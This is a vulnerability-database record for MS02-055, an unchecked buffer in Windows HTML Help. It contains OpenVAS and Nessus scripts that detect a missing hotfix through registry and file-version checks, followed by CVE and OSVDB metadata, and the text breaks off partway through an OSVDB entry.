ID OPENVAS:136141256231011147 Type openvas Reporter Copyright (C) 2002 SECNAP Network Security, LLC Modified 2020-06-09T00:00:00
Description
An unchecked buffer in Windows Help could allow an attacker to
gain control over a user's system.
###############################################################################
# OpenVAS Vulnerability Test
#
# Unchecked Buffer in Windows Help(Q323255)
#
# Authors:
# Michael Scheidell SECNAP Network Security
#
# Copyright:
# Copyright (C) 2002 SECNAP Network Security, LLC
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
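# Metadata pass: when the scanner loads the script with `description` set,
# only the registration calls below run and exit(0) returns before any
# detection logic is reached.
if(description)
{
  # Identity and revision stamps for this test.
  script_oid("1.3.6.1.4.1.25623.1.0.11147");
  script_version("2020-06-09T11:16:08+0000");
  script_tag(name:"last_modification", value:"2020-06-09 11:16:08 +0000 (Tue, 09 Jun 2020)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");

  # Advisory cross-references and CVSS v2 scoring. Two CVEs are attached to
  # this one check although the script name mentions only the unchecked
  # buffer; both map to the single hotfix Q323255 tested below.
  script_bugtraq_id(4387, 5874);
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2002-0693", "CVE-2002-0694");

  script_name("Unchecked Buffer in Windows Help(Q323255)");
  # ACT_GATHER_INFO: the script only reads data already collected from the
  # target; nothing here sends exploit traffic.
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2002 SECNAP Network Security, LLC");
  script_family("Windows : Microsoft Bulletins");

  # Scheduling prerequisites: the registry enumeration script must have run
  # and set the KB key below (presumably after an authenticated SMB session;
  # verify against secpod_reg_enum.nasl). Without it this test is skipped,
  # which is not the same as "not vulnerable".
  script_dependencies("secpod_reg_enum.nasl");
  script_mandatory_keys("SMB/registry_enumerated");

  # Fixed wording: the summary previously read "could allow an attacker to
  # could gain control over user's system".
  script_tag(name:"summary", value:"An unchecked buffer in Windows help could allow an attacker to
gain control over a user's system.");

  # NOTE(review): Windows 98 / 98 SE / ME are listed as affected, but the
  # detection code passes only nt, win2k and xp to hotfix_check_sp(), so
  # those hosts are presumably never reported by this script.
  script_tag(name:"affected", value:"- Microsoft Windows 98
- Microsoft Windows 98 (Second Edition)
- Microsoft Windows (Millennium Edition)
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 (Terminal Server Edition)
- Microsoft Windows 2000
- Microsoft Windows XP");

  script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");
  script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055");

  # qod_type "registry": the verdict rests on registry contents alone, so a
  # result is only as reliable as the hotfix bookkeeping on the host.
  script_tag(name:"qod_type", value:"registry");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}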
# hotfix_check_sp() and hotfix_missing() are not defined in this file;
# presumably they come from this include.
include("secpod_reg.inc");

# Gate on operating system and service-pack level. Only NT 4.0, Windows 2000
# and Windows XP thresholds are supplied; a result of zero or less ends the
# script without a report.
# NOTE(review): the exact meaning of each return value is defined in
# secpod_reg.inc; confirm there before changing the thresholds.
sp_state = hotfix_check_sp(nt:7, win2k:4, xp:1);
if (sp_state <= 0)
  exit(0);

# Report when the helper says hotfix Q323255 is missing. This is a
# registry-based check: it does not inspect hhctrl.ocx itself, so treat a
# finding (or its absence) as an indicator and confirm with a file-version
# check where the result matters. The report carries no descriptive text,
# only port 0.
hotfix_state = hotfix_missing(name:"Q323255");
if (hotfix_state > 0)
{
  security_message(port:0);
}
{"id": "OPENVAS:136141256231011147", "type": "openvas", "bulletinFamily": "scanner", "title": "Unchecked Buffer in Windows Help(Q323255)", "description": "An unchecked buffer in Windows help could allow an attacker to\n could gain control over user", "published": "2005-11-03T00:00:00", "modified": "2020-06-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011147", "reporter": "Copyright (C) 2002 SECNAP Network Security, LLC", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055"], "cvelist": ["CVE-2002-0694", "CVE-2002-0693"], "lastseen": "2020-06-11T15:22:36", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0693", "CVE-2002-0694"]}, {"type": "nessus", "idList": ["SMB_NT_MS02-055.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:11147"]}, {"type": "osvdb", "idList": ["OSVDB:867", "OSVDB:2992"]}, {"type": "exploitdb", "idList": ["EDB-ID:21902"]}], "modified": "2020-06-11T15:22:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-06-11T15:22:36", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "136141256231011147", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Unchecked Buffer in Windows Help(Q323255)\n#\n# Authors:\n# Michael Scheidell SECNAP Network Security\n#\n# Copyright:\n# Copyright (C) 2002 SECNAP Network Security, LLC\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11147\");\n script_version(\"2020-06-09T11:16:08+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 11:16:08 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(4387, 5874);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2002-0693\", \"CVE-2002-0694\");\n script_name(\"Unchecked Buffer in Windows Help(Q323255)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2002 SECNAP Network Security, LLC\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"summary\", value:\"An unchecked buffer in Windows help could allow an attacker to\n could gain control over user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 98\n\n - Microsoft Windows 98 (Second Edition)\n\n - Microsoft Windows (Millennium Edition)\n\n - Microsoft Windows NT 4.0\n\n - Microsoft Windows NT 4.0 (Terminal Server Edition)\n\n - Microsoft Windows 2000\n\n - Microsoft Windows XP\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"secpod_reg.inc\");\n\nif ( hotfix_check_sp(nt:7, win2k:4, xp:1) <= 0 ) exit(0);\nif ( hotfix_missing(name:\"Q323255\") > 0 )\n security_message(port:0);\n", "naslFamily": "Windows : Microsoft Bulletins"}
{"cve": [{"lastseen": "2021-02-02T05:19:06", "description": "Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function.", "edition": 4, "cvss3": {}, "published": "2002-10-10T04:00:00", "title": "CVE-2002-0693", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2002-0693"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_me:*", "cpe:/o:microsoft:windows_98se:*", "cpe:/o:microsoft:windows_98:*", "cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2000_terminal_services:*", "cpe:/o:microsoft:windows_nt:4.0"], "id": "CVE-2002-0693", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0693", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:19:06", "description": "The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka \"Code Execution via Compiled HTML Help File.\"", "edition": 4, "cvss3": {}, "published": "2002-10-10T04:00:00", "title": "CVE-2002-0694", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0694"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_me:*", "cpe:/o:microsoft:windows_98se:*", "cpe:/o:microsoft:windows_98:*", "cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2000_terminal_services:*", 
"cpe:/o:microsoft:windows_nt:4.0"], "id": "CVE-2002-0694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:server:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0694", "CVE-2002-0693"], "description": "An unchecked buffer in Windows help could allow an attacker to\ncould gain control over user's system.\n\nMaximum Severity Rating: Critical \n\nRecommendation: Customers should install the patch immediately. 
\n\nAffected Software: \n\nMicrosoft Windows 98 \nMicrosoft Windows 98 Second Edition \nMicrosoft Windows Millennium Edition \nMicrosoft Windows NT 4.0 \nMicrosoft Windows NT 4.0, Terminal Server Edition \nMicrosoft Windows 2000 \nMicrosoft Windows XP \n\nSee\nhttp://www.microsoft.com/technet/security/bulletin/ms02-055.mspx", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11147", "href": "http://plugins.openvas.org/nasl.php?oid=11147", "type": "openvas", "title": "Unchecked Buffer in Windows Help(Q323255)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: smb_nt_ms02-055.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Unchecked Buffer in Windows Help(Q323255)\n#\n# Authors:\n# Michael Scheidell SECNAP Network Security\n#\n# Copyright:\n# Copyright (C) 2002 SECNAP Network Security, LLC\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"An unchecked buffer in Windows help could allow an attacker to\ncould gain control over user's system.\n\nMaximum Severity Rating: Critical \n\nRecommendation: Customers should install the patch immediately. 
\n\nAffected Software: \n\nMicrosoft Windows 98 \nMicrosoft Windows 98 Second Edition \nMicrosoft Windows Millennium Edition \nMicrosoft Windows NT 4.0 \nMicrosoft Windows NT 4.0, Terminal Server Edition \nMicrosoft Windows 2000 \nMicrosoft Windows XP \n\nSee\nhttp://www.microsoft.com/technet/security/bulletin/ms02-055.mspx\";\n\nif(description)\n{\n script_id(11147);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(4387, 5874);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2002-0693\", \"CVE-2002-0694\"); \n\n name = \"Unchecked Buffer in Windows Help(Q323255)\";\n \n script_name(name);\n \n\n\n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n \n script_copyright(\"This script is Copyright (C) 2002 SECNAP Network Security, LLC\");\n family = \"Windows : Microsoft Bulletins\";\n script_family(family);\n \n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"secpod_reg.inc\");\n\nif ( hotfix_check_sp(nt:7, win2k:4, xp:1) <= 0 ) exit(0);\nif ( hotfix_missing(name:\"Q323255\") > 0 ) \n\tsecurity_message(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-03-01T06:18:11", "description": "The remote host contains a version of the HTML Helpfacility ActiveX\ncontrol module that could allow an attacker to execute arbitrary code on\nthe remote host by constructing a malicious web page and enticing 
a\nvictim to visit it.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2002-10-24T00:00:00", "title": "MS02-055: Unchecked Buffer in Windows Help Facility Could Enable Code Execution (323255)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0694", "CVE-2002-0693"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS02-055.NASL", "href": "https://www.tenable.com/plugins/nessus/11147", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11147);\n script_version(\"1.44\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2002-0693\", \"CVE-2002-0694\");\n script_bugtraq_id(4387, 5872, 5874);\n script_xref(name:\"MSFT\", value:\"MS02-055\");\n script_xref(name:\"MSKB\", value:\"323255\");\n\n script_name(english:\"MS02-055: Unchecked Buffer in Windows Help Facility Could Enable Code Execution (323255)\");\n script_summary(english:\"Checks for MS Hotfix Q323255, Unchecked Buffer in Windows Help facility\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the web\nclient.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of the HTML Helpfacility ActiveX\ncontrol module that could allow an attacker to execute arbitrary code on\nthe remote host by constructing a malicious web page and enticing a\nvictim to visit it.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2002/ms02-055\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows NT, 2000 and XP.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS02-055';\nkb = '323255';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(nt:'6', win2k:'1,3', xp:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = 
hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.1\", file:\"Hhctrl.ocx\", version:\"5.2.3669.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Hhctrl.ocx\", version:\"5.2.3669.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"4.0\", file:\"Hhctrl.ocx\", version:\"5.2.3669.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2002-0694"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nOVAL ID: 403\nMicrosoft Security Bulletin: MS02-055\nMicrosoft Knowledge Base Article: 323255\nKeyword: aka \"Code Execution via Compiled HTML Help File\" \nISS X-Force ID: 10254\n[CVE-2002-0694](https://vulners.com/cve/CVE-2002-0694)\nCIAC Advisory: n-002\n", "modified": "2002-10-02T00:00:00", "published": "2002-10-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:867", "id": "OSVDB:867", "title": "Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2002-0693"], "edition": 1, "description": "## Vulnerability Description\nMicrosoft Windows HTML Help ActiveX Control contains a flaw that allows remote attackers to execute arbitrary code. The flaw occurs due to an unchecked buffer in the hhctrl.ocx file. 
